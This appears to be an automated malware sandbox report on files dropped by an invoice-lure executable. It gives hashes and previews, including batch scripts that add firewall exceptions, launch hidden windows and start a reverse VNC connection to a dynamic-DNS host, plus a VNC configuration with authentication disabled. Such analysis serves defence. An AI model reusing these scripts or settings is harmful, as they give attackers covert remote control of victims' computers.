                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                            Category:dropped
                                                                            Size (bytes):1419751
                                                                            Entropy (8bit):7.976496077007677
                                                                            Encrypted:false
                                                                            SSDEEP:24576:/VRaWL07oXGZ4YIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:tRaWLxXGZ4ZGh3mlind9i4ufFXpAXkru
                                                                            MD5:41034A6B023B6BB9C723DA146E190954
                                                                            SHA1:22C95166FF8A1C4D2AAC25B75D804CEBAAA6ACF2
                                                                            SHA-256:52BB8B0CA62248721986D650004C11ACCB0C988B6FBA645D9B4E3557CA87A15D
                                                                            SHA-512:6F8CD54BBB750E32FEBD78895F433CCF0C553C56E6B7DDEA03E3EA36ED283084CF6EA6FA8999162999D184B0F04B6E6DAB7F6FC27648EE517F744D7E8DBC8AAD
                                                                            Malicious:false
                                                                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                            Category:dropped
                                                                            Size (bytes):758601
                                                                            Entropy (8bit):7.98639316555857
                                                                            Encrypted:false
                                                                            SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                            MD5:3A49135134665364308390AC398006F1
                                                                            SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                            SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                            SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                            Malicious:false
                                                                            Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                            Category:dropped
                                                                            Size (bytes):386528
                                                                            Entropy (8bit):7.9736851559892425
                                                                            Encrypted:false
                                                                            SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                            MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                            SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                            SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                            SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                            Malicious:false
                                                                            Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):5038592
                                                                            Entropy (8bit):6.043058205786219
                                                                            Encrypted:false
                                                                            SSDEEP:49152:vVkDvLSkqdbEsuV+ebMh8w+/H8pF/bmlEyGjWvcP1xQ+X7TqVAMPLfQyim8kznsY:2Ll+Mn0WHl9VA2ic/
                                                                            MD5:11F7419009AF2874C4B0E4505D185D79
                                                                            SHA1:451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
                                                                            SHA-256:AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
                                                                            SHA-512:1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.D!...!...!...(.V.C...5..."...5...&...5...)...!......5...:...5... ...5...R...5.:. ...5... ...Rich!...................PE..d...p............." .........D...............................................`M.....'.M...`A........................................@.H.L&....I......@K.H.....I..............@M.....`J:.p.......................(....%..............@.......$.H......................text...4B.......D.................. ..`.wpp_sf.....`.......H.............. ..`.rdata...L*......N*.................@..@.data...hD...PI......*I.............@....pdata........I......2I.............@..@.didat.......0K.......J.............@....rsrc...H....@K.......J.............@..@.reloc.......@M.. ....L.............@..B........................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:PDF document, version 1.7, 1 pages
                                                                            Category:dropped
                                                                            Size (bytes):44763
                                                                            Entropy (8bit):7.691836262046289
                                                                            Encrypted:false
                                                                            SSDEEP:768:9paAbg8/yZjn2K/Cgrf7F0kTRelSLcBzWAMMwsOt+yn9:9Lyp2oLTk4ItWAMMO9
                                                                            MD5:E3B54910AAE9324A7D56E5B22044104E
                                                                            SHA1:F93D54BC3E20316DD9B596D4EB0FE22BD9F1D4D8
                                                                            SHA-256:01FA678A302763B83703F0449FC63309CF7677FC119D2755DEFAD6DEA9D25BCD
                                                                            SHA-512:0549192D6C52053BA1F1C9AFB38B2243EA8BE119DD0FBDE3D15BCBA073911B59669BEEFDFD0C8AADFCEAE44A4AF2C7B09C76EE1EC88C0E13F5406283019FCB6A
                                                                            Malicious:false
                                                                            Preview:%PDF-1.7.%.....3 0 obj.<<./Type /XObject./Subtype /Image./Width 825./Height 540./BitsPerComponent 8./ColorSpace /DeviceRGB./Filter /DCTDecode./DecodeParms <<./Quality 80.>>./Length 5 0 R.>>.stream......C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((........9.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....C...e...4...i........W........\T...........W.........2...}_.O.&..Q.9P\........W.........2...m_.O.&.,Q.9P\........W..............?...qF(.As....6...m_.O.&.........?...qF(.As....2...}_.O.&....
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):47744
                                                                            Entropy (8bit):6.688410109072587
                                                                            Encrypted:false
                                                                            SSDEEP:768:523s2H65HQdvusvavk76GDN8YeGQEky64UyToJs+i:5VQV75NzHae
                                                                            MD5:E818AB67C68E3EE621A8888FBBF2F266
                                                                            SHA1:644D473097112A48338202A418911716AAC5B9D8
                                                                            SHA-256:FF9D8F7FC2C3F5D0AFAF6F76E87D41FEEABF54FACBE26DC59661A78830F32972
                                                                            SHA-512:B67F0A1AB49E57459AFA8FD4E4FFC18BC2A8B2D7803C34A952656113D175A145AB2C1ABDE25272442759EC148BE8A5A05D44A6CE89DD882329BA436534D53BE4
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W.,.W.,.W.,''.-.W.,''.-.W.,''.-.W.,./.,.W.,.<.-.W.,.W.,.W.,.<.-.W.,g&.-.W.,g&.-.W.,g&.-.W.,Rich.W.,........PE..L....Z._...........!.....f...8.......=..............................................%.....@A........................ ...`.......................................h.......8...........................................................................text....d.......f.................. ..`.rdata...'.......(...j..............@..@.data...d...........................@....reloc..h...........................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:Windows setup INFormation
                                                                            Category:modified
                                                                            Size (bytes):3890
                                                                            Entropy (8bit):3.7119439709099047
                                                                            Encrypted:false
                                                                            SSDEEP:48:5oAqyb+l0sOIbxcfW2iIVOgUqGNnijzXLTRkYx:jAIVANniNx
                                                                            MD5:D3153DDC1A7EB32C396E59E0CD2ECA50
                                                                            SHA1:285BC785A8E9D76BA652A841A4331A1F6DFE9431
                                                                            SHA-256:F615C264E1A04A5A18C62C08CABB9EBE8F76D964B04A111169F76C9036F260DD
                                                                            SHA-512:AAD64BD3A90C41E35667AA9C7B017F4FDCF0705BD2B70F105193390E3C727A2E410DBA9764BC5343220E9A2A0880B830C81AF4973DECE92AB64B90E1DC77DDC6
                                                                            Malicious:false
                                                                            Preview:..;.....;. .U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...i.n.f.....;.........[.V.e.r.s.i.o.n.].....P.n.p.L.o.c.k.D.o.w.n.=.1.....S.i.g.n.a.t.u.r.e.=.".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s.G.U.I.D. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r.=.%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e.=.U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .1.0./.1.8./.2.0.2.0.,.1.7...6...4.2...4.9.9.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.=.S.t.a.n.d.a.r.d.,.N.T.x.8.6.........[.S.t.a.n.d.a.r.d...N.T.x.8.6.].....%.D.e.v.i.c.e.N.a.m.e.%.=.M.y.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y.....%.D.e.v.i.c.e.N.a.m.e.%.=.M.y.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...d.l.l.=.1...
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):8560
                                                                            Entropy (8bit):7.2886183166813785
                                                                            Encrypted:false
                                                                            SSDEEP:192:N0xTS0+qInYe+PjPN3KowgCuodZubhSZyEl8YsuUAwCNQw1e9:NeInYPLNaowNZvZyEPLwPws9
                                                                            MD5:B2957E97DD342E0C0C5B58CB4DF951E6
                                                                            SHA1:A21F84EB2217DA6AB5079BFEFADC29503A662F6E
                                                                            SHA-256:1105E05993AB4EA8EFD6475FFEB82091BA61387E2D4F531AE5C6097E9BF530D3
                                                                            SHA-512:093E1FC0C322DAD8C902D8B116B3D66EDA79C3A3B51A40358A202801E850728049D0702C1F03466E17A0F390EE6B79BBDA6B2B59D2151A28EA00054294BD6503
                                                                            Malicious:false
                                                                            Preview:0.!l..*.H........!]0.!Y...1.0...+......0.....+.....7......0...0...+.....7.......(..i.@..##6....201018150649Z0...+.....7.....0...0.......A.&r..{...(..R..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...d.l.l...0....([....k.R.A.3..m..11..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...i.n.f...0.... ....0DL....\MCT........=...ww..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...d.l.l...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ....0DL....\MCT........=...ww..0.... ...d.JZ..,.....v.d.J..i.l.6.`.1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...i.n.f...0U..+.....7...1G0E0...
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:Generic INItialization configuration [admin]
                                                                            Category:dropped
                                                                            Size (bytes):1208
                                                                            Entropy (8bit):5.080950758931414
                                                                            Encrypted:false
                                                                            SSDEEP:24:fJhFXNTxYgMKM0USlAdo9g9iWFOWIaGEToIeXYMyd5Tgc8OjulnN:fJzr8gUUAdTZOW+ooBI9j0NOjS
                                                                            MD5:C5F11F117A37314A4DDAE8D4BFCA23B7
                                                                            SHA1:58D1DFE525248BF51847526388F8D68CD3E50EA6
                                                                            SHA-256:200A7BF46C84F3F71DACC5ECE63E87B9BEF981325DC76462076923F574E12C1D
                                                                            SHA-512:0E99FD926F0FAA0CC576C6FF509CF037FFB2596FD5CB3A8BC5B080ED7BECDF29526C5CCACD1B5EBE2E243E0ECFF8186F81A14F16D3FB3C0472F38A3F50897652
                                                                            Malicious:false
                                                                            Preview:[Permissions]..[admin]..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=1..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=No Plugin Detected..primary=1..secondary=1..SocketConnect=1..HTTPConnect=1..AutoPortSelect=1..InputsEnabled=1..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..EnableUnicodeInput=0..EnableWin8Helper=0..QuerySetting=2..QueryTimeout=10..QueryDisableTime=0..QueryAccept=0..LockSetting=0..UseRegistry=0..MSLogonRequired=0..NewMSLogon=0..DebugMode=2..Avilog=0..kickrdp=0..service_commandline=..DebugLevel=10..DisableTrayIcon=0..rdpmode=0..LoopbackOnly=0..AllowLoopback=1..AuthRequired=0..ConnectPriority=0..AuthHosts=..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..PortNumber=5900..HTTPPortNumber=5800..IdleInputTimeout=0..RemoveWallpaper=0..RemoveAero=0..QueryIfNoLogon=0..FileTransferTimeout=1..clearconsole=0..accept_reject_mesg=..KeepAliveInterval=5..[UltraVNC]..passwd=000000000000000000..passwd2=000000000000000000..[poll]..Turb
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1035
                                                                            Entropy (8bit):5.154375767864971
                                                                            Encrypted:false
                                                                            SSDEEP:24:nep9ZV2tXY7ur3C7TEPaV1k774kIg41k7z2GD:6oo7urwEiNUz26
                                                                            MD5:B9B8C2AD3F16DD1EE7518B5B4ED165B1
                                                                            SHA1:FC8D881BF7B13DF8E7BF31B6F811F53C44F8336D
                                                                            SHA-256:C2AB7B8701BDC36198A8F01791C8A3479EF3E8BCC6CCD3BD8C2F60DD9672E8E1
                                                                            SHA-512:8CF8E80D8A8DB779B40005D87EFDAB57042026C62D4182129FC247F091E0C51E854509F85575BF0418A97FCAE096AA093CFB9128CF411E1993486F07A3BD966B
                                                                            Malicious:false
                                                                            Preview:::::::::::::::::::::::::::::..:: START ::..::::::::::::::::::::::::::::..Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2*" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:*1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:*1=%%]="%%%%GUID[%%i:*1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..set /a numa=%random% %%9999 +1000..set /a numb=%random% %%9999 +1000..set /p numc=<IDD.txt..type C:\Games\cmd.txt|cmd..start C:\Games\viewer.exe /HideWindow C:\Games\once.cmd .. ....:com ..for %%A in (C:\Games\cmmc.cmd) do if %%~zA gtr 7 start C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd..timeout /t
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1102
                                                                            Entropy (8bit):5.375478540906423
                                                                            Encrypted:false
                                                                            SSDEEP:24:np9ZV2tXY7ur3C7TEPaV1k774kIwoNEGMoNha9d0aR/vA+ZyZB:5oo7urwEieG75aRQ+Zs
                                                                            MD5:8AADF3A1016440B07F8F3152E5755A41
                                                                            SHA1:9B6FC4D8890FE08F427928A6ACCEF39F592FB271
                                                                            SHA-256:B3C509FC687793ED75F2792540EFBDAB88D65CA18570C28651DA737CAC6544B7
                                                                            SHA-512:40DA5935BFD778559B1EC982B3C3B928766E288BC00BE3C8A85C41B9942E2E66CC19C5CCB4F1105AC5C2DEA3EE44FF9F421895CFBF6DBB6B58AB1226C4C0A1BF
                                                                            Malicious:false
                                                                            Preview:Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2*" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:*1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:*1=%%]="%%%%GUID[%%i:*1=%%]%%%%","%%C".. Set/A i+=1.. )..) ....netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL....netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL....set RUN_C="taskhost.exe"..wmic process where (name=%RUN_C%) get commandline | findstr /i %RUN_C%> NUL..if errorlevel 1 (..start C:\Games\taskhost.exe -autoreconnect ID:%numc% -connec
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1221
                                                                            Entropy (8bit):5.351088398106411
                                                                            Encrypted:false
                                                                            SSDEEP:24:op9ZV2tXY7ur3C7TEPaV1k774kIg4P5W40aJfiyZr/vA+coq+Hoq+Hoq+e:coo7urwEi0LahVQ+cx+Hx+Hx+e
                                                                            MD5:76147E456F8F392405B1FBAC4F315A30
                                                                            SHA1:FC90A4B0428DF537ED3FEE1A1B2E25C3C2A07D5A
                                                                            SHA-256:D69E739F18BD24DB5CFD451FB2BDAB32B4EFEEF41145B75CB89C7DC56641852D
                                                                            SHA-512:470EE57AC19364CCF4CDD8019A168440822E3E2B2708A3C4B5A4C5C0A3090C1BFEC1248E6AB1B23F93B5434FED3C69210A2161A56747231C25972752493AFD7C
                                                                            Malicious:false
                                                                            Preview:SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2*" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:*1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:*1=%%]="%%%%GUID[%%i:*1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..set /a numa=%random% %%999 +100..set /a numb=%random% %%999 +100..set /a numc=5%numa%%numb%....set RUN_C="taskhost.exe"..wmic process where (name=%RUN_C%) get commandline | findstr /i %RUN_C%> NUL..if errorlevel 1 (..start %temp%/~.pdf..) else (.. @echo not starting %RUN_C%: already running...)..echo %numc% > IDD.txt..rem start C:\Games\taskhost.exe -multi -autoreconnect ID:%numc% -connect vnvariant2024.ddnsfree.com:5500 -run..start C:
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):253280
                                                                            Entropy (8bit):6.610000632203147
                                                                            Encrypted:false
                                                                            SSDEEP:6144:vroB+yBBquE2s4MSp5Y1HKKfkXNoIij+bvNf4wmNJh/WLX:E+yhEBge1H0rij+RQwgh/Wz
                                                                            MD5:1D34EBEE7F7B9966DC449388438E80D5
                                                                            SHA1:E3A30BC84D733ED907A2CBBFC3F5E16900A5B2CE
                                                                            SHA-256:0D44439A0425DF8ABF338BD1496679A144DD705A51832A05C1A4ED1F76756EBA
                                                                            SHA-512:D7A8AC4E9D824DCB1C8AF5574E7818ED6F515A75C47F50AB380492F87CF0D0AC853956DD93262286C064FFE5E48CEC899A960DD20E466B74E911C88975AB3E0B
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C...........h......h.....h......U......U...b..U......h........................A..........Rich...........PE..L......_...........!.........$.......j...................................................@..........................u.......u..........................`............1..p...........................P2..@............................................text...o........................... ..`.rdata..............................@..@.data....+...........p..............@....SharedD............................@....rsrc...............................@..@.reloc...........0..................@..B................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):799
                                                                            Entropy (8bit):5.23166754615022
                                                                            Encrypted:false
                                                                            SSDEEP:24:nep9ZV2tXY7ur3C7TEPaV1k774kIg41k7oy:6oo7urwEiNUoy
                                                                            MD5:FD877AE342E4E8B246D11700EB90B23D
                                                                            SHA1:9C1790DB6B9CBD9C5BF2B12B8FBCF6A342A6FD3A
                                                                            SHA-256:1CE4768F825372D55C1D30CE3AC41AFB913DE6299A64AE5B0AC1B3B752421D64
                                                                            SHA-512:2B26CAE19DC5C485076C6C8C740F5E621F1B507163D26FB8E31CCE78F6917A170FE9D9BA0976E7C6079ED50F448FCEA1C365E0B3F4C522981C10330C04932E99
                                                                            Malicious:false
                                                                            Preview:::::::::::::::::::::::::::::..:: START ::..::::::::::::::::::::::::::::..Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2*" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:*1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:*1=%%]="%%%%GUID[%%i:*1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..set /a numa=%random% %%9999 +1000..set /a numb=%random% %%9999 +1000..start C:\Games\viewer.exe /HideWindow C:\Games\c.cmd..EXIT
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4
                                                                            Entropy (8bit):2.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:4Q:4Q
                                                                            MD5:F24F62EEB789199B9B2E467DF3B1876B
                                                                            SHA1:DE3AC21778E51DE199438300E1A9F816C618D33A
                                                                            SHA-256:E596899F114B5162402325DFB31FDAA792FABED718628336CC7A35A24F38EAA9
                                                                            SHA-512:C2636AD578F7B925EE4CF573969D4EC6640DE7B0176BF1701ADECE3A75937DC206AB1B8EE5343341D102C3BED1EC804A5C2A9E1222A7FB53A3CC02DA55487329
                                                                            Malicious:false
                                                                            Preview:exit
                                                                            Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {3A995974-27F0-4693-BBBA-215A8CDC3544}, Number of Words: 2, Subject: Your Application, Author: Your Company, Name of Creating Application: Advanced Installer 17.3 build 2e9bb285, Template: ;1033, Comments: This installer database contains the logic and data required to install Your Application., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                            Category:dropped
                                                                            Size (bytes):976384
                                                                            Entropy (8bit):6.553744622059538
                                                                            Encrypted:false
                                                                            SSDEEP:24576:m7bYOINVUuD6yS1wGbXpsHzCsa1fLK/hVrA:m7bYO+UuD6ySaGbX+H9at+hVrA
                                                                            MD5:AA6C669C39D9BE8B6289F10DAAFBA6F3
                                                                            SHA1:A7A73BD177B58847F42DAE48DA443E33482DD337
                                                                            SHA-256:C5BF02C8C23DBF8798D87FAD91EA44A3153FC1026248BD931F360BA0D6C5989E
                                                                            SHA-512:1A7A272E63BEDA9B887158E8187C5D8A2351B21FDF912951555CF0DB9F693A4C92DEC4628C9FFE2E535D7FB869E03C12EB236DC8FD21E2118ED1BF193A010E93
                                                                            Malicious:false
